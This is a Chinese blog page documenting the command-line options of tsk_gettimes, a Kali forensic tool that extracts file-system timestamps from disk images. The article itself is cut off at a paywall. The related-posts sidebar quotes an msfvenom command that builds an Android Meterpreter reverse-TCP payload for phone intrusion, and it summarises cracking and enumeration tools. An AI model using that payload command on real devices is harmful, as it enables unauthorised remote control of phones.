最新kali之tsk_gettimes

最新推荐文章于 2022-03-31 21:43:55 发布
最新推荐文章于 2022-03-31 21:43:55 发布
阅读量189 收藏
点赞数
分类专栏: kali top13中文手册 文章标签: linux debian 安全 经验分享
本文链接:https://blog.csdn.net/qq_40399982/article/details/113129615
版权
kali top13中文手册 专栏收录该内容
64 篇文章 96 订阅 ¥9.90 ¥99.00
订阅专栏
tsk_gettimes工具用于从磁盘映像中提取文件系统的MAC时间,并以可作为mactime输入的格式输出。它检查每个文件系统,提供与运行'fls -m'相同的信息,帮助创建文件活动的时间线。用户可以通过命令行参数进行操作,并将输出重定向到文件。关注相关资讯可查阅kali专属资源。
摘要由CSDN通过智能技术生成

描述:

  将磁盘映像中的MAC时间收集到主体文件中。
  tsk_gettimes检查磁盘映像中的每个文件系统,并以MACtime主体格式返回有关它们的数据(与在每个文件系统上运行’fls -m’相同)。 它的输出可以用作mactime的输入,以建立文件活动的时间表。 数据被打印到STDOUT,然后可以将其重定向到文件。

参数如下:

-v
	详细输出到stderr

-V
	打印版本信息

-f fstype
	指定文件系统类型。 使用“ -f列表”列出支持的文件系统类型。 如果未给出,则使用自动检测方法。

-i imgtype
	图像文件的格式,如raw。使用'-i list'列出支持的类型。如果没有给出,使用自动检测方法。

-b dev_sector_size
	设备扇区的大小(以字节计)。如果没有给出,使用自动检测方法。

-o sector_offset
	如果没有给定要恢复的卷(只恢复该卷)的扇区偏移量,将尝试恢复映像中的所有卷并将它们保存到不同的文件夹。

-s seconds
	原始系统的时间偏差(以秒为单位)。 例如,如果原始系统的速度慢了100秒,则该值为-100。

-z zone
	原始系统时区的ASCII字符串。例如,EST或GMT。这些字符串必须由您的操作系统定义,并且可能有所不同。

image [images]
	要读取的磁盘或
了解本专栏 订阅专栏 解锁全文
Vanony
关注
专栏目录
订阅专栏
最新kalitsk_recover
vanony的博客
01-26 312
描述:   将文件从映像导出到本地目录中。   tsk_recover将文件从映像恢复到output_dir。 默认情况下,仅恢复未分配的文件。 带有标志,它将导出所有文件。 参数如下: -v 详细输出到stderr -V 打印版本信息 -a 仅恢复已分配文件 -e 恢复所有文件(已分配和未分配) -f fstype 指定文件系统类型。 使用“ -f列表”列出支持的文件系统类型。 如果未给出,则使用自动检测方法。 -i imgtype 图像文件的格式,例如raw。 使用“ -i列表”列
KALI 2020 软件集成清单——数字取证(十一)
weixin_44024324的博客
05-07 2467
11、数字取证 11.1取证分割工具集 11.1.1 magicrescue 基于特征码文件恢复工具,该工具直接从磁盘中读取原始数据,搜索特征码。一旦找到已知类型的特征码,就根据渗透测试人员提供的提取策略调用第三方工具提取数据,并进行保存。为了方便对提取的数据整理,该工具还提供去重功能和分类保存功能。 11.1.2 scalpel 扫描整个镜像文件,根据配置文件寻找相关文件类型的文件头和文件尾,正...
kali_更改_国内源
摸鱼域的空气。
02-28 6378
奶奶说,让人快乐的事是分享。 一、介绍 kali默认的官方源地址,在国外。 当我们更新数据的时候,可能会造成更新过慢,或者,更新失败。 造成这一原因的产生是,中国域互联网的特色。 所以有本教程,将其源换成国内的地址。 二、国内源 #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling ma.
kali连接蓝牙_蓝牙攻击指南(kali
weixin_39805924的博客
12-22 4933
基本操作hciconfig 查看蓝牙设备信息hcitool:这是一个查询工具。 可以用来查询设备名称,设备ID,设备类别和设备时钟。hcidump:可以使用这个来嗅探蓝牙通信hciconfig hci0 up 启动蓝牙设备hciconfig hci0 down 关闭蓝牙设备service bluetooth start 启动蓝牙服务bluetoothctl 蓝牙控制台错误 Failed to pa...
最新kali安装tor_外网走起
帅醉了的博客
03-03 9405
出现“有未能满足的依赖关系。请尝试不指明软件包的名字来运行“apt --fix-broken install”(也可以指定一个解决办法)。” 解决方案: sudo apt --fix-broken install -y 再执行 sudo apt update && sudo apt full-upgrade -y sudo apt install tor -y ...
kali攻击手机_kali linux入侵安卓手机
热门推荐
weixin_35930535的博客
12-30 1万+
这里是做次笔记。kali入侵安卓手机的方法和其他的博主方法一样,只是开头对手机的ip进行设置首先,我用的靶机是魅蓝2,对其网络使用静态ip:xxx.xxx.xxx.aaa,“x”是需要对应入侵机的ip,“a”则是没用过的0-255随便输msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root...
kali python编程_kali Python编程环境搭建
weixin_42131352的博客
02-06 2426
一、查看PYTHON版本信息Kali Linux默认已经安装了Python运行环境,运行下面的命令,可以查看当前Python版本。python --version 二、PYTHON软件包安装Python软件包安装,我们这里介绍三种方法,分别为手动,easy_install和pip安装。1、手动安装第一种方法是手动下载软件包,运行安装程序来安装。比如我们想要使用Python-nmap组件去解析nma...
kali翻译插件_Kali2.0上的一款翻译神器【GoldenDict神器介绍】
weixin_39835117的博客
01-14 3886
很多玩Kali的小伙伴,可能很多人就是英语不好,然后就放弃了Kali这款超级好使的渗透测试人员的操作系统,也许很多工具的使用帮助文档全是英文的看不懂,不知道这条英文提示是什么意思,不要担心,我现在来推荐一款可以Kali中系统中,或者从终端窗口取词的翻译神器—————————————–GoldenDict第一步——如何安装使用Kali的官方源就行#kali官方源deb http://http.kal...
kali_上传_腾讯云_搭建kali
摸鱼域的空气。
03-31 4454
奶奶说,分享最重要。 一、环境介绍 1、网络切换为NAT模式 我之前写过了,就不在操作展示啦 2、开启ssh服务 3、安装cloud-init 终端输入: wget https://launchpad.net/cloud-init/trunk/17.1/+download/cloud-init-17.1.tar.gz 下图为执行效果, 此时cloud-init文件的安装包就下载到了/home/lqx目录下, 下一步进行解压操作: tar -zxvf cloud-in...
minidwep-gtk-kali_40420_amd64.deb
05-22
本工具(水滴minidwep-gtk)仅仅只用于个人无线网络渗透测试,严禁其他任何用途!!
Kali_Linux_AMD64.torrent
08-20
Kali系统官网种子
最新kalitsk_comparedir
vanony的博客
01-25 388
描述:   将目录的内容与映像或本地设备的内容进行比较。   tsk_comparedir将映像的内容与comparison_directory的内容进行比较。 这对于检测rootkit和进行测试很有用。 可以通过比较本地目录和本地原始设备的内容来检测Rootkit。 直接从原始设备读取数据时,rootkit通常不会隐藏数据。 参数如下: -o sector_offset 要比较的映像或设备中的分区的扇区偏移量。 -n start_inum 从映像中一个目录开始比较。 -v 详细输出到stderr
最新kali之hashcat
vanony的博客
01-21 3959
描述:   基于CPU的高级密码恢复实用程序。   Hashcat是世界上最快的基于CPU的密码恢复工具。   尽管它的速度不及其GPU同类产品oclHashcat,但通过良好的字典和对命令开关的一点了解,可以轻松地将大型列表一分为二。   Hashcat是自称为世界上最快的基于CPU的密码恢复工具。受hashcat支持的哈希算法包括Microsoft LM Hashes,MD4,MD5,SHA系列,Unix Crypt格式,MySQL,Cisco PIX。 选项: -h,--help 显示选项摘要信息。
最新kali之john
vanony的博客
01-21 3855
描述:   查找用户弱密码的工具。   本手册页简要介绍了john命令。 该手册页是为Debian GNU / Linux发行版编写的,因为原始程序没有手册页。 约翰,又名John Ripper,是一种在服务器中查找用户弱密码的工具。 John可以使用字典或某种搜索模式以及密码文件来检查密码。 John支持不同的破解模式,并了解许多密文格式,例如几种DES变体,MD5和河豚。 它还可以用于提取AFS和Windows NT密码。 用法:   要使用John,您只需要提供一个密码文件和所需的选项即可。 如果未指
最新kali之pixiewps
vanony的博客
01-23 3058
描述:   离线Wi-Fi保护设置暴力破解工具。   Pixiewps是一种用C语言编写的工具,用于利用某些访问点的低熵或不存在熵来对WPS PIN方法进行暴力破解,即所谓的“小尘埃攻击”。   它仅用于教育目的。 参数: 所需的参数: -e,--pke M1中找到的被注册人的DH公钥。 -r,--pkr 在M2中找到的注册服务商的DH公钥。 可以通过在Reaver和pixiewps中指定--dh-small来避免这种情况。 -s,--e-hash1 参与者的哈希1,位于M3中。 这是
最新kali之smbmap
vanony的博客
01-24 2897
描述:   SMB枚举工具。   SMBMap允许用户枚举整个域中的samba共享驱动器。 列出共享驱动器,驱动器权限,共享内容,上载/下载功能,文件名自动下载模式匹配,甚至执行远程命令。 该工具在设计时就考虑了笔测试,旨在简化大型网络中潜在敏感数据的搜索。 选项: 主要参数: -H HOST 主机IP --host-file FILE 包含主机列表的文件 -u USERNAME 用户名,如果省略,则假定为空会话 -p PASSWORD 密码或NTLM哈希 -s SHARE
最新kali之enum4linux
vanony的博客
01-20 2796
描述:   enum4linuxKali Linux自带的一款信息收集工具。它可以收集Windows系统的大量信息,如用户名列表、主机列表、共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等。该工具主要是针对Windows NT/2000/XP/2003,在Windows 7/10系统,部分功能受限。总的来说,一个工具可以获取这么多的信息,也算非常强大了。 简单的封装了在samba包中的工具,以提供类似的enum.exe功能(以前从www.bindview.com)。 为了方便起见,还增加
最新kali之proxychains4
vanony的博客
01-23 2590
描述: 通过代理服务器重定向连接。 该程序强制任何给定的tcp客户端建立的任何tcp连接都遵循代理(或代理链)。 它是一种代理。 它的作用类似于sockscap / premeo / eborder驱动程序(拦截TCP调用)。 此版本(v4)支持SOCKS4,SOCKS5和HTTP CONNECT代理服务器。 身份验证类型:socks - "user/pass" , http - "basic". 什么时候使用它? 1. 从局域网获取“外部”的唯一方法是通过代理服务器。 2. 当您位于限制性防火墙后面时,
kali升级软件_kalilinux首次安装后更新数据源方法
最新发布
05-24
Kali Linux首次安装后,为了更新数据源,需要执行以下步骤: 1. 打开终端并切换到root用户。 2. 运行以下命令来更新软件包...完成以上步骤后,您的Kali Linux系统将会是最新的,并且已经更新了最新的软件包信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vanony

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值